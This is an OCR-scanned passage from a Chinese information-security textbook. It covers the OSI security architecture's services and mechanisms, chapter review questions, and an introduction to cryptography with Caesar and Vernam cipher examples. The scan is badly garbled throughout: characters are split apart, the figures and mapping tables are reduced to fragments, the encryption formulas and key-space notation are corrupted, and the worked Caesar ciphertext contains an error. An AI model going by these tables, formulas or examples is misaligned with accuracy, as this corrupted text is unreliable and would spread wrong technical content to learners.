色情 、 暴 力 信息 的 过 滤 等 。 内 容 安全 的 难点 在 于 如 何 有 效 地 理解 信息 内 容 , 甄 别 其 合法 
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性 ,涉及 的 主要 技术 包括 文本 识别 .图像 识 别 、 音 视频 识别 、 隐 写 术 、 数 字 水 印 以 及 内 容 过 
滤 等 。 

管理 安全 指 通过 对 人 的 信息 行为 的 规范 和 约束 ,实现 对 信息 机 密 性 、 完 整 性 .可 用 性 
及 可 控 性 的 保护 “三 分 技术 ,七 分 管理 ,技术 是 实现 的 手段 ,对 人 的 行为 的 管理 是 信息 
安全 的 关键 所 在 。 管 理 安全 主要 涉及 的 内 容 包括 安全 策略 法律 法 规 . 安 全 组 织 、 安 全 教 
育 等 。 


334 面向 网 络 的 09 信息 安全 体系 结构 


信息 安全 已 经 发 展 成 为 一 个 综合 性 的 .复杂 的 交叉 性 学 科 。 广 义 地 说 ,信息 安全 体系 
结构 是 以 保障 组 织 (包括 其 信息 系统 ) 的 工作 使 命 为 目标 ,而 建立 的 一 套 体现 安全 策略 的 
有 关 技 术 体 系 、 组 织 体系 和 管理 体系 的 资源 集成 和 配置 方案 。 

在 基于 网 络 的 分 布 式 系统 或 应 用 中 ,信息 需要 在 网 络 中 传输 ,因此 一 般 面临 着 公用 网 
络 中 的 安全 通信 和 实体 认证 等 问题 。20 世纪 80 年 代 , 国际 标 准 化 组 织 (International 
Organization for Standardization, ISO ) 推出 了 基于 开放 系统 互 连 (Open System 
Interconnection,OSD) 参 考 模型 中 七 层 协议 之 上 的 信息 安全 体系 结构 。OSI 开放 系统 互 
连 安全 体系 结构 是 一 个 普遍 适用 的 安全 体系 结构 ,提供 了 解决 开放 互 连 系统 中 安全 问题 
的 一 致 性 方法 ,对 网 络 信息 安全 体系 结构 的 设计 具有 重要 的 指导 意义 。 

为 了 保证 异 构 计算 机 进程 与 进程 之 间 远 距离 交换 信息 的 安全 ,OSI 安全 体系 结构 定 
义 五 大 类 安全 服务 和 对 这 五 大 类 安全 服务 提供 支持 的 八 类 安全 机 制 ,以 及 相应 的 开放 式 
系统 互 连 的 安全 管理 ,图 3-7 为 其 安全 体系 结构 的 三 维 示意 图 。 


人 OSI 参考 模型 
7 上 应 用 层 
6 厂 表示 屋 
5 | 会 话 层 
4 上 一 传输 层 
3 厂 网 络 层 
2 一 链 路 层 
1 三 物理 层 安全 机 制 
鉴别 服务 II 
加 数 访 数 数 业 路 公 
访问 控制 密 字 问 据 据 务 由 证 
数据 完整 性 稚 控 完 交流 控 
数据 保密 性 名 制 整 换 填 制 
抗 低 加 性 名 
安全 服务 
图 3-7 OSI 开放 系统 互 连 安全 架构 
1. 安全 服务 
安全 服务 (Security Service) 是 指 计 算 机 网 络 提供 的 安全 防护 措施 。 国 际 标准 化 组 织 
定义 的 安全 服务 包括 以 下 五 大 类 。 


(1) 鉴别 服务 : 可 以 鉴别 参与 通信 的 对 等 实体 和 源 ; 授 权 控 制 的 基础 ;提供 双向 的 认 
证 ;一 般 采用 高 效 的 密码 技术 来 进行 身份 认证 。 


第 3 章 ， 信 息 安全 基本 概念 与 原理 \@®S 


(2) 访问 控制 : 控制 不 同 用 户 对 信息 资源 访问 权限 ;要 求 有 审计 核查 功能 ; 尽 可 能 地 
提供 细 粒 度 的 控制 。 

(3) 数据 完整 性 : 指 通 过 网 上 传输 的 数据 应 防止 被 修改 、 删 除 、 插 入 替换 或 重 发 ,以 
保证 合法 用 户 接收 和 使 用 该 数据 的 真实 性 ;用 于 对 付 主 动 威胁 。 

(4) 数据 保密 性 : 提供 保护 ,防止 数据 未 经 授权 就 泄露 ;基于 对 称 密 钥 和 非 对 称 密 钥 
加 密 的 算法 。 

(5) 抗 抵赖 性 : 接收 方 要 发 送 方 保证 不 能 否认 收 到 的 信息 是 发 送 方 发 出 的 信息 ,而 
不 是 被 他 人 冒名 算 改 过 的 信息 ;发送 方 也 要 求 对 方 不 能 否认 已 经 收 到 的 信息 ,防止 否认 对 
金融 电子 化 系统 很 重要 。 

2. 安全 机 制 

安全 机 制 (Security Mechanism) 是 用 来 实施 安全 服务 的 机 制 。 安 全 机 制 既 可 以 是 具 
体 的 .特定 的 ,也 可 以 是 通用 的 。 国 际 标准 化 组 织 定 义 的 安全 机 制 有 : 

(1) 数据 加 密 机 制 : 向 数据 和 业务 信息 流 提供 保密 性 ,对 其 他 安全 机 制 起 补充 作用 ; 

(2) 数据 签名 机 制 : 对 数据 单元 签名 和 验证 ,签名 只 有 利用 签名 者 的 私有 信息 才能 
产生 出 来 ; 

(3) 访问 控制 机 制 : 利用 某 个 实体 经 鉴别 的 身份 或 关于 该 实体 的 信息 或 该 实体 的 权 
标 ,进行 确定 并 实施 实体 的 访问 权 ; 可 用 于 通讯 连接 的 任何 一 端 或 用 在 中 间 连 接 的 任何 
位 置 ; 

(4) 数据 完整 性 机 制 : 两 个 方面 ,单个 的 数据 单元 或 字段 的 完整 性 、 数 据 单 元 串 或 字 
段 串 的 完整 性 ， 

(5) 鉴别 交换 机 制 : 通过 信息 交换 以 确保 实体 身份 的 机 制 ; 

(6) 业务 填充 机 制 : 一 种 制造 假 的 通讯 实例 、 产 生 欺 骗 性 数据 单元 或 在 数据 单元 中 
产生 假 数据 的 安全 机 制 ; 提 供 对 各 种 等 级 的 保护 ,防止 业务 分 析 ; 只 在 业务 填充 受到 保密 
性 服务 时 有 效 ; 

(7) 路 由 控制 机 制 : 路 由 既 可 以 动态 选择 ,也 可 以 事先 安排 ;携带 某 些 安全 标签 的 数 
据 可 能 被 安全 策略 禁止 通过 某 些 子 网 .中继站 或 链 路 ;连接 的 发 起 者 可 以 请 求 回避 特定 的 
子 网 .中 继 站 或 链 路 ; 

(8) 公证 机 制 : 关于 在 两 个 或 三 个 实体 之 间 进 行 通讯 的 数据 的 性 能 ,可 由 公证 机 制 
来 保证 ;保证 由 第 三 方 提供 ;第 三 方 能 得 到 通讯 实体 的 信任 。 

表 3-1 给 出 了 OSI 信息 安全 体系 结构 中 安全 服务 于 安全 机 制 之 间 的 对 应 关系 , 描 
述 了 各 安全 机 制 所 能 实现 的 安全 服务 。 例 如 ,加 密 机 制 可 以 用 于 实现 鉴别 服务 、 数 据 
保密 性 服务 于 数据 完整 性 等 服务 ,而 鉴别 交换 安全 机 制 只 能 用 于 鉴别 服务 中 对 等 实体 
的 鉴别 。 

表 3-2 给 出 了 OSI 信息 安全 体系 中 安全 服务 与 七 层 网 络 协议 之 间 的 配置 关系 ,以 实 
现 网 络 数据 传输 的 安全 需求 。 在 OSI 七 层 协议 中 ,理论 上 除了 会 话 层 外 ,其 他 层 均 可 配 
置 相 应 的 安全 服务 。 但 是 ,最 适合 配置 安全 服务 的 是 物理 层 、 网 络 层 、 传 输 层 及 应 用 层 ,其 
他 层 一 般 不 适合 配置 安全 服务 。 
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表 3-1 OSI 安全 服务 于 安全 机 制 之 间 的 对 应 关系 
安全 机 制 


安全 服务 加 密 | 数字 | 访问 | 数据 | 鉴别 | 业务 
签名 | 控制 | 完整 性 | 交换 | 填充 


对 等 实体 鉴别 到 到 Y 
鉴别 服务 


数据 源 鉴别 下 Y 


访问 控制 | 访问 控制 服务 区 


连接 保密 性 


无 连接 保密 性 


NE 选择 字段 保密 性 


流量 保密 性 


有 恢复 功能 的 连接 完整 性 


无 恢复 功能 的 连接 完整 性 


数据 完整 性 | 选择 字段 连接 完整 性 


无 连接 完整 性 


< < < < cc Re 


选择 字段 非 连接 完整 性 


抗 抵 可 性 源 发 方 抗 抵赖 


<|<|<| < 
< < < < < < < 


接收 方 抗 抵赖 


表 3-2 安全 服务 与 OSI 各 协议 层 之 间 的 配置 关系 
安全 服务 OSI 协议 层 


五 大 类 物理 | 链 路 | 网 络 | 传输 | 会 话 


对 等 实体 鉴别 一 = 


鉴别 


数据 源 鉴别 三 三 


访问 控制 服务 二 等 


连接 机 密 性 至 到 


< < < < 


访问 控制 ”| 无 连接 机 密 性 把 至 


< < < < < 


选择 字段 机 密 性 


流量 机 密 性 


有 恢复 功能 的 连接 机 密 性 YY 一 和 一 


无 恢复 功能 的 连接 机 密 性 一 一 至 一 


数据 完整 性 | 选择 字段 连接 完整 性 = 三 Y 到 = 


无 连接 完整 性 


选择 字段 非 连接 完整 性 = = Y Y = 


源 发 方 抗 抵赖 性 
抗 抵赖 性 


接收 方 抗 抵赖 性 


| < < < < < 
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3.4 本 章 小 结 


随 着 互联 网 的 发 展 和 信息 技术 的 普及 ,网 络 和 信息 技术 已 经 渗入 到 日 常生 活 和 工作 
中 。 然 而 ,社会 信息 化 和 信息 网 络 化 的 同时 ,信息 安全 问题 成 为 影响 国家 安全 、 经 济 发 展 、 
社会 稳定 、 公 民利 益 的 重要 问题 。 特 别 是 在 云 环境 和 大 数据 时 代 信 息 安 全 面临 新 的 挑战 。 
2014 年 2 月 27 日 ,中 央 网 络 安全 和 信息 化 领导 小 组 宣告 成 立 , 既 表明 了 网 络 信息 安 全 目 
前 面临 的 形势 任务 复杂 和 所 处 地 位 的 重要 ,也 标志 着 中 国 已 把 信息 化 和 网 络 信 息 安 全 列 
人 了 国家 发 展 的 最 高 战略 方向 之 一 。 因 此 ,学 习 并 掌握 信息 安全 的 理论 与 技术 对 于 建立 
安全 的 网 络 应 用 环境 具有 重要 的 意义 。 
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1. 简 述 信息 安全 体系 三 个 最 基本 的 目标 。 

2. 信息 安全 PDRR 模型 包括 哪些 环节 ? 每 个 工作 环节 的 具体 含义 是 什么 ? 

3. 信息 系统 中 有 哪 三 个 基本 组 成 部 分 ? 面向 应 用 的 层次 型 信息 安全 技术 体系 中 针 
对 每 个 部 分 存在 哪些 安全 层次 ? 

4. OSI 开放 系统 互 连 安全 体系 结构 中 定义 了 哪些 安全 服务 和 安全 机 制 ? 

5. 结合 附录 案例 ,分 析 HH 市 中 小 企业 服务 平台 建设 方案 中 可 能 面临 的 信息 安全 问 
题 有 哪些 ? 
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密 码 学 


本 章 学 习 要 点 : 

也 了 解密 码 学 发 展 历史 ;掌握 密码 体制 模型 及 相关 概念 、 密 码 体 制 的 原则 、 密 码 体制 
的 分 类 、 密 码 体制 的 安全 性 分 类 及 典型 攻击 方式 ; 

如 掌握 分 组 密码 设计 的 一 般 原理 ;了 解 DES 算法 ; 

扣 掌握 序 列 密码 基本 原理 ;理解 并 掌握 线性 移 位 反馈 寄存 器 ; 了解 非 线 性 序列 的 生 
成 方法 ;了 解 典 型 的 序列 密码 算法 ; 

如 掌握 Hash 的 概念 、 结 构 及 应 用 ;了 解 典型 的 Hash 算法 ;理解 消息 认证 码 的 概念 ; 
掌握 基于 DES、 基 于 Hash 的 消息 认证 码 ; 

要 掌握 公开 密 钥 密码 系统 的 特点 及 原理 ;掌握 RSA 的 公 角 密码 算法 ; 

如 掌握 数字 签名 的 特性 和 原理 ;了 解 基 于 RSA 数字 签名 方案 ; 

如 理解 并 掌握 密 钥 管理 的 层次 结构 ;了 解密 钥 建 立 、 协 商 的 方法 ;了 解 PKI 技术 。 


4.1 密码 学 概述 


在 附录 的 案例 “H 市 中 小 企业 服务 平台 建设 方案 "中 ,系统 中 涉及 政府 的 机 密 信 息 、 
中 小 企业 的 重要 数据 ,对 重要 的 信息 需要 通过 加 密 机 制 保证 其 机 密 性 。 

信息 安全 的 主要 任务 是 研究 计算 机 系统 和 通信 和 网络 中 信息 的 保护 方法 ,密码 学 理论 
和 技术 就 是 其 中 一 个 重要 的 研究 领域 ,可 以 说 密码 学 是 保障 信息 安全 的 核心 基础 。 

密码 学 (cryptology) 起 源 于 保密 通信 技术 ,是 结合 数学 .计算 机 、 信 息 论 等 学 科 的 一 
门 综合 性 、 交 叉 性 学 科 。 密 码 学 又 分 为 密码 编码 学 (cryptography) 和 密码 分 析 学 
(cryptanalysis) 两 部 分 。 密 码 编码 学 主要 研究 如 何 设 计 编 码 , 使 得 信息 编码 后 除 指定 接 
收 者 外 的 其 他 人 都 不 能 读 懂 。 密 码 分 析 学 主要 研究 如 何 攻击 密码 系统 ,实现 加 密 消 息 的 
破译 或 消息 的 伪造 。 这 两 个 分 支 既 相 互 对 立 又 相互 依存 , 正 是 由 于 这 种 对 立 统一 关系 , 才 
推动 了 密码 学 自身 的 发 展 。 


411 密码 学 发 展 简 史 


密码 学 一 词 源 自 希腊 文 “kryptes”( 隐 藏 的 ) 及 “grdphein”( 书 写 ) 两 字 , 即 隐秘 地 传递 
信息 。 人 类 对 密码 的 研究 和 应 用 已 有 几 千 年 的 历史 ,其 发 展 经 历 了 古典 密码 时 期 .近代 密 
码 时 期 和 现代 密码 时 期 三 个 阶段 。 
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1. 古典 密码 时 期 

自从 人 类 有 了 战争 ,就 有 了 保密 通信 ,也 就 有 了 密码 的 应 用 。 一 般 认 为 古典 密码 时 期 
是 从 古代 到 19 世纪 末 , 这 个 阶段 长 达 数 千年 。 由 于 这 个 时 期 生产 力 低下 ,产生 的 许多 密 
码 体制 都 是 以 纸 笔 或 者 简单 器 械 实现 加 、 解 密 的 , 它 的 基本 技巧 都 是 较 简 单 的 代 换 、 换 位 
或 者 是 两 者 的 结合 。 古 代 加 解密 方法 主要 基于 手工 完成 , 密 文 信息 一 般 通 过 人 (信使 ) 来 
传递 ,此 时 期 也 被 称 为 密码 学 发 展 的 手工 阶段 。 

这 个 时 期 的 经 典 案 例 有 : 公元 前 2 世纪 希腊 人 设计 的 棋盘 密码 、 公 元 前 约 50 年 古 罗 
马凯 撤 大 帝 发 明 的 凯撒 密码 ,美国 南北 战争 时 期 军队 中 使 用 过 的 栅栏 密码 等 等 。 目 前 ,这 
个 时 期 提出 的 所 有 密码 方法 已 全 部 破译 。 

2. 近代 密码 时 期 

近代 密码 时 期 是 指 20 世纪 初期 到 20 世纪 50 年 代 末 。19 世纪 的 工业 革命 为 使 用 更 
加 复杂 的 密码 技术 提供 了 条 件 ,频繁 的 战争 加 速 了 密码 技术 的 快速 发 展 。 在 这 个 时 期 , 密 
码 设 计 者 设计 出 了 一 些 利用 电动 机 械 设备 实现 信息 加 密 、 解 密 操作 的 密码 方法 ,采用 电报 
机 发 送 加 密 的 信息 。 这 个 时 期 虽然 加 解密 技术 和 设备 有 了 很 大 的 进步 ,但 是 还 没有 形成 
密码 学 理论 ,加 解密 的 主要 原理 仍然 是 代 换 、 换 位 以 及 两 者 的 结合 。 

这 个 时 期 的 著名 密码 主要 有 : 美国 电话 电报 公司 的 Gillbert Vernam 设计 的 Vernam 
密码 .第 二 次 世界 大 战 中 使 用 的 Enigma 转 轮 密码 机 。 

3. 现代 密码 时 期 

1949 年 ,香农 (Shannon) 发 表 了 《保密 系统 的 通信 理论 》(Communication Theory of 
Secrecy Systems) ,将 信息 论 引 入 到 密码 学 的 研究 ,为 密码 编码 学 和 密码 分 析 学 黄 定 了 坚 
实 的 理论 基础 ,把 密码 学 置 于 坚实 的 数学 基础 之 上 ,标志 着 密码 学 作为 一 门 科 学 的 形成 。 
1976 年 W，Diffie 和 M.， Hellman 提出 公开 密 钥 密码 体制 思想 ,从 根本 上 克服 了 传统 密 
码 在 密 钥 分 发 上 的 困难 ,给 密码 学 的 发 展 带 来 了 质 的 飞跃 。 

由 于 历史 局 限 ,20 世纪 70 年 代 中 期 以 前 的 密码 学 研究 基本 上 是 秘密 地 进行 的 ,主要 
用 于 军事 政府. 外交 等 重要 部 门 。 密 码 学 的 真正 攻 勃 发 展 和 广泛 应 用 是 从 20 世纪 70 年 
代 中 期 开始 的 。1977 年 美国 颁布 了 数据 加 密 标准 (Date Encryption Standard,DES) , 揭 
开 了 密码 学 的 神秘 面纱 ,使 密码 学 得 以 在 商业 等 民用 领域 广泛 应 用 。1978 年 ,美国 麻 省 
理工 学 院 的 Rivest、Shamir 和 Adleman 基于 数论 中 的 大 整数 因子 分 解困 难 问题 ,提出 了 
第 一 个 公认 安全 ,实用 的 公 钥 密码 体制 一 一 RSA 公 钥 密码 。1994 年 美国 联邦 政府 颁布 
密 钥 托管 加 密 标 准 (Escrow Encryption Standard, EES) 和 数字 签名 标准 (Digital 
Signature Standard, DSS), 2001 年 美国 联邦 政府 颁布 高 级 加 密 标 准 (Advanced 
Encryption Standard,AES)。 这 些 都 是 现代 密码 发 展 史 上 的 一 个 个 重要 里 程 碑 。 

现代 密码 学 主要 内 容 及 联系 如 图 4-1 所 示 , 这 些 密码 技术 为 信息 安全 中 的 机 密 性 、 完 整 
性 、 认 证 性 和 不 可 否认 性 提供 基本 的 保障 ,本 章 将 主要 对 图 中 涉及 的 密码 学 知识 进行 介绍 。 

随 着 计算 机 科学 的 蓬勃 发 展 ,出 现 了 快速 电子 计算 机 和 现代 数学 方法 ,它们 一 方面 为 
加 密 技术 提供 了 新 的 概念 和 工具 , 另 一 方面 也 给 密码 破译 者 提供 了 有 力 的 武器 ,二 者 相互 
促进 ,使 密码 技术 飞速 发 展 。 计 算 机 和 电子 时 代 的 到 来 ,为 密码 设计 者 提供 了 前 所 未 有 的 
条 件 , 从 而 可 以 设计 出 更 加 复杂 和 更 为 高 效 的 密码 体制 。 


完整 人 性 [下 使 [不 可 开 认 性 ) 
f 2 
消息 认证 实体 认证 
之 
Hash 函 数 一 | 数字 签名 技术 
密 钥 管理 技术 非 对 称 密码 


图 4-1 密码 学 基本 内 容 及 其 联系 


近年 来 ,由 于 其 他 相关 学 科 的 进步 和 发 展 ,也 出 现 了 一 些 新 兴 、 交 叉 性 的 密码 技术 。 
例如 : 随 着 量子 计算 研究 热潮 的 兴起 ,世界 各 国 对 量子 密码 的 研究 也 广泛 地 开展 起 来 。 
量子 密码 具有 可 证 明 的 安全 性 ,同时 还 能 对 窃听 行为 方便 地 进行 检测 。 这 些 特 性 使 量子 
密码 具有 一 些 其 他 密码 所 没有 的 优势 ,因而 量子 密码 引起 国际 密码 学 界 的 高 度 重视 ,我国 
研究 专家 已 在 此 领域 多 次 取得 世界 性 突破 成 果 。 本 书 最 后 一 童 将 对 量子 密码 进行 简单 
介绍 。 


412 密码 体制 的 基本 组 成 及 分 类 


密码 学 的 基本 思想 就 是 对 信息 进行 伪装 。 伪装 前 的 信息 称 为 明文 ,通常 用 p 
(plaintext) 或 者 m(message) 表 示 ; 伪 装 后 的 消息 称 为 密 文 ,通常 用 c(ciphertext) 表 示 。 
图 4-2 是 基于 密码 技术 的 保密 通信 基本 模型 。 这 种 对 信息 的 伪装 可 以 表示 成 一 种 可 逆 的 
数学 变换 ,从 明文 到 密 文 的 变换 称 为 加 密 (encryption) ,从 密 文 到 明文 的 变换 称 为 解密 
(decryption)。 加 密 和 解密 都 是 在 密 钥 (key) 的 控制 下 进行 的 。 


一 | (主动 攻击 ) (被 动 攻击 ) - 
干扰 型 攻击 者 | 斤 线 信道 搭 线 信道 | 安打 型 攻击 者 
FE 
明文 信 源 | -| 加 密 器 | 全 一 | 解密 器 | | 按 收 
ke fs 
秘密 信道 
窗 负 源 -一 | 密 负 浙 


图 4-2 保密 通信 的 一 般 模 型 


一 个 密码 体制 (cryptosystem) 由 五 个 部 分 组 成 : 

(1) 明文 空间 M, 它 是 全 体 明 文 m 的 集合 ; 

(2) 密 文 空间 C, 它 是 全 体 密 文 c 的 集合 ; 

(3) 密 钥 空间 K, 它 是 全 体 密 钥 的 集合 。 其 中 每 一 个 密 钥 & 均 由 加 密 密 钥 &。 和 解 
密 密 钥 As 组 成 , 即 & 一 (Re ,ka); 

(4) 加 密 算法 E, 是 在 密 钥 控制 下 将 明文 消息 从 M 对 应 到 C 的 一 种 变换 , 即 c 一 忆 
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(CR。 ,72) 3 
(5) 解密 算法 D, 是 在 密 钥 控制 下 将 密 文 消息 从 C 对 应 到 M 的 一 种 变换 , 即 m= 二 D 
(ps 
下 面 通过 两 个 著名 古典 密码 实例 来 进一步 说 明 密码 体制 的 组 成 部 分 。 
【 例 4-1】 凯撒 密码 应 用 示例 。 
古风 马 的 凯撒 大 帝 发 明了 一 种 用 于 战 时 秘密 通信 的 方法 ,后 来 称 之 为 凯撒 密码 。 他 
将 英文 字母 按 字母 表 的 顺序 构成 一 个 字母 序列 链 , 然 后 将 最 后 一 个 字母 与 第 一 个 字母 相 
连 成 环 。 加 密 的 方法 是 将 明文 中 的 每 个 字母 用 其 后 的 第 三 个 字母 代替 。 解 密 时 ,只 需 把 
密 文中 每 个 字母 用 其 前 第 三 个 字母 代替 即 得 明文 。 使 用 凯撒 密码 对 明文 字符 串 逐 位 加 密 
结果 如 下 : 
明文 zu 一 It is a secret 
密 文 c=LWLVDVHEFUHW 
将 明文 字母 表 中 的 每 个 字母 用 密 文 字母 表 中 的 相应 字母 来 代替 ,这 类 密码 称 为 代替 
密码 。 凯 撤 密码 就 是 一 种 代替 密码 ,其 明 密 文字 母 对 照 表 如 表 4-1 所 示 ,用 数学 语言 可 以 
表示 为 : 
M=C={(zlzE[0,25] 且 rzrEZ) AR 一 如 一 3; 
E(k.,m) = (m+t+3) mod 26; D(ka,c) 一 (c 一 3) mod 26。 
表 4-1 凯撒 密码 明 密 文 对 照 表 了 


EE 


0|1|1213|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24| 25 


3|14|15|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|0|1|2 
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【 例 4-2〗 Vernam 密码 应 用 示例 。 
美国 电话 电报 公司 的 Gillbert Vernam 在 1917 年 为 电报 通信 设计 了 一 种 非常 方便 的 密 
码 , 后 来 被 称 为 Vernam 密码 。 在 对 明文 加 密 前 ,首先 将 明文 编码 为 (0,1) 序 列 , 加 密 时 用 明 
文 与 密 钥 进 行 模 2 相 加 ,解密 时 将 密 文 再 与 密 钥 模 2 相 加 即 可 。 如 密 钥 为 10010 00101 时 对 
明文 比特 串 加 密 结果 如 下 
明文 : m 二 10001 11000 
密 文 : c=00011 11101 
这 种 密码 体制 第 一 次 使 加 解密 可 以 直接 由 机 器 来 实现 ,因而 在 近代 密码 学 发 展 史上 
占有 重要 地 位 。Vernam 密码 可 以 用 数学 语言 表述 如 下 (其 中 由 表示 模 2 加 ) : 
M= 王 (7 一 (Co :72 72)17 一 0 或 1}; 
C={c=(c0s0 yc 和 …)|ci 一 0 或 1); 


@ 为 加 以 区 分 ,这 里 明文 用 小 写字 母 表示 , 密 文 用 大 写字 母 表示 。 


信息 安全 导论 


K= {k=k.=ks= (ko ski, ki) k=0 或 1}; 
E(k,m)= (mo Dhko ,mm Dk, ,miODhi ,nn); 
Dk,c)= (co Dko ,cc Dh, ,cDk;,*%)。 

在 应 用 Vernam 密码 时 ,如 果 每 次 使 用 不 同 的 随机 密 钥 对 明文 进行 加 密 , 则 被 称 为 一 
次 一 密 密 码 。 

密码 体制 是 实现 加 密 和 解密 功能 的 密码 方案 , 密 钥 空间 中 不 同 密 钥 的 个 数 称 为 密码 
体制 的 密 钥 量 , 它 是 衡量 密码 体制 安全 性 的 一 个 重要 指标 。 同 时 ,根据 加 、 解 密 密 钥 的 使 
用 策略 不 同 , 又 可 将 密码 体制 分 为 对 称 密码 体制 和 非 对 称 密码 体制 。 

1. 对 称 密码 体制 

如 果 一 个 密码 体制 中 的 加 密 密 钥 和 和 解密 密 钥 名 相同 ,或 者 由 其 中 一 个 密 钥 很 容易 
推算 出 另 一 个 密 钥 , 则 称 该 密码 体制 为 对 称 密码 体制 (Symmetric Cryptosystem) 或 单 钥 密码 
体制 (One-key Cryptosystem) 。 因 为 在 使 用 过 程 中 , 密 钥 必 须 严格 保密 ,所 以 也 被 称 为 秘密 
密 钥 密码 体制 (Secret Key Cryptosystem) 。 典 型 的 对 称 密码 体制 有 DES、AES 等 。 

对 称 密码 体制 因为 其 具有 安全 高效、 经 济 等 特点 ,发 展 非常 迅速 ,并 被 广泛 应 用 。 依 
据 处 理 数据 的 方式 ,对 称 密码 体制 通常 又 分 为 分 组 密码 (Block Cipher) 和 序列 密码 
(Stream Cipher) 。 

分 组 密码 是 将 定 长 的 明文 块 (如 64 位 一 组 ) 转 换 成 等 长 的 密 文 , 这 一 过 程 在 密 钥 的 控 
制 下 完成 。 解 密 时 使 用 逆向 变换 和 同一 密 钥 来 完成 。 序 列 密码 是 指 加 、 解 密 时 对 明文 中 
比特 逐个 进行 处 理 , 也 被 称 为 流 密码 。 

对 称 密码 体制 主要 用 来 对 信息 进行 保密 ,实现 信息 的 机 密 性 。 它 的 优点 是 加 密 和 解 
密 处 理 效率 高 , 密 钥 长 度 相 对 较 短 ,一 般 情况 下 加 密 后 密 文 和 明文 长 度 相同 。 但是, 对称 
密码 体制 也 存在 一 些 固 有 的 缺陷 ,如 需要 安全 通道 分 发 密 钥 、 保 密 通 信 的 用 户 数量 多 时 密 
钥 量 大 难于 管理 、 难 以 解决 不 可 否认 性 等 问题 。 

2. 非 对 称 密码 体制 

1976 年 , Diffie 和 Hellmen 发 表 了 具有 里 程 碑 意 义 的 《密码 学 的 新 方向 》( New 
Direction in Cryptography), 提 出 了 非 对 称 密码 的 思想 , 即 加 密 过 程 和 解密 过 程 使 用 两 
个 不 同 的 密 钥 来 完成 。 进 一 步 说 ,如 果 在 计算 上 巾 加密 密 钥 &. 不 能 推出 解密 密 钥 ev , 那 
么 将 k&。 公开 不 会 损害 & 的 安全 ,于 是 可 以 将 公开 ,因此 这 种 密码 体制 也 被 称 为 公 钥 密 
码 (Public Key Cryptosystem) , 亦 称 双 钥 密码 体制 (Two Key Cryptosystem)。 典 型 的 非 
对 称 密码 体制 (Asymmetric Cryptosystem) 有 RSA、ElGamal 等 。 

非 对 称 密码 体制 的 提出 解决 了 对 称 密码 体制 的 固有 缺陷 , 它 不 仅 可 以 保障 信息 的 机 
密 性 ,还 可 以 对 信息 进行 数字 签名 ,具有 认证 性 和 抗 否 认 性 的 功能 。 不 过 , 非 对 称 密码 体 
制 与 对 称 密码 体制 相 比 ,其 设计 所 依赖 的 数学 计算 较 复 杂 ,因而 加 密 、 解 密 效率 较 低 。 在 
达到 同样 安全 强度 时 , 非 对 称 密码 通常 所 需 的 密 钥 位 数 较 多 ,并且 加 密 产 生 的 密 文 长 度 通 
常会 大 于 明文 长 度 。 因 此 ,在 保密 通信 过 程 中 通常 是 用 对 称 密码 来 进行 大 量 数据 的 加 密 ， 
而 用 非 对 称 密码 来 传输 少量 数据 ,如 对 称 密码 所 使 用 的 密 钥 信 息 。 
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密码 学 的 基本 目的 就 是 保障 不 安全 信道 上 的 通信 安全 。 密 码 学 领域 存在 一 个 很 重要 
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的 事实 :“ 如 果 许 多 聪明 人 都 不 能 解决 的 问题 .那么 它 可 能 不 会 很 快 得 到 解决 .” 这 暗示 很 
多 加 密 算法 的 安全 性 并 没有 在 理论 上 得 到 严格 的 证 明 , 只 是 这 种 算法 思想 出 来 以 后 ,经 过 
许多 人 许多 年 的 攻击 并 没有 发 现 其 弱点 ,没有 找到 攻击 它 的 有 效 方法 ,从 而 认为 它 是 安全 
的 。 一般 地 ,衡量 密码 体制 安全 性 的 方法 有 三 种 : 

第 一 种 方法 是 计算 安全 性 (computational security), 又 称 实际 保密 性 (practical 
secrecy) 。 如 果 一 种 密码 系统 最 有 效 的 攻击 算法 至 少 是 指数 时 间 的 , 则 称 这 个 密码 体制 
是 计算 安全 的 。 在 实际 中 ,人 们 说 一 个 密码 系统 是 计算 上 安全 的 ,意思 是 利用 已 有 的 最 好 
方法 破译 该 系统 所 需要 的 努力 超过 了 攻击 者 的 破译 能 力 ( 如 时 间 、 空 间 和 资金 等 资源 ) 。 

第 二 种 方法 是 可 证 明 安 全 性 (provable security) 。 如 果 密 码 体制 的 安全 性 可 以 归结 
为 某 个 数学 困难 问题 , 则 称 其 是 可 证 明 安全 的 。 例 如 ,RSA 密码 可 以 归结 为 大 整数 因数 
分 解 问题 ,ElGamal 密码 可 以 归结 为 有 限 域 上 离散 对 数 求解 问题 。 香 农 曾 指出 ,设计 一 个 
安全 的 密码 本 质 上 是 要 寻找 一 个 难 解 的 问题 。 

第 三 种 方法 是 无 条 件 安全 性 (unconditional security) 或 者 完善 保密 性 (perfect 
secrecy)。 假 设 存在 一 个 具有 无 限 计 算 能 力 的 攻击 者 ,如 果 密 码 体制 无 法 被 这 样 的 攻击 
者 攻破 , 则 称 其 为 无 条 件 安全 。 香 农 证 明了 一 次 一 密 密 码 具有 无 条 件 安 全 性 , 即 从 密 文中 
得 不 到 关于 明文 或 者 密 钥 的 任何 信息 。 

一 个 实用 的 密码 体制 的 设计 应 该 遵守 以 下 原则 

(1) 密码 算法 安全 强度 高 。 就 是 说 攻击 者 根据 截获 的 密 文 或 某 些 已 知 明文 密 文 对 ， 
要 确定 密 钥 或 者 任意 明文 在 计算 上 不 可 行 。 

(2) 密码 体制 的 安全 性 不 应 依赖 加 密 算法 的 保密 性 ,而 应 取决 于 可 随时 改变 的 密 钥 。 
即使 密码 分 析 者 知道 所 用 的 加 密 体制 ,也 无 助 于 用 来 推导 出 明文 或 密 钥 。 

(3) 密 钥 空间 应 足够 大 。 使 试图 通过 穷 举 密 钥 空 间 进 行 搜索 的 方式 在 计算 上 不 
可 行 。 

(4) 既 易于 实现 又 便于 使 用 。 主 要 是 指 加 密 函 数 和 解密 函数 都 可 以 高 效 地 计算 。 

其 中 第 (2) 条 是 著名 的 柯 克 霍 夫 (Kerckhoffs) 原 则 ,是 由 荷兰 密码 学 家 奥 古 斯 特 。 柯 
克 霍 夫 于 1883 年 在 其 名 著 ( 军 事 密码 学 ) 中 提出 的 。 如 果 密 码 体 制 的 安全 强度 依赖 攻击 
者 不 知道 的 密码 算法 ,那么 这 个 密码 体制 最 终 必定 失败 。 柯 克 霍 夫 原 则 指出 密码 算法 应 
该 是 公开 的 。 密 码 算法 的 公开 不 仅 有 利于 增加 密码 算法 的 安全 性 ,还 有 利于 密码 技术 的 
推广 应 用 ,有 利于 增加 用 户 使 用 的 信心 ,也 有 利于 密码 技术 的 发 展 。 
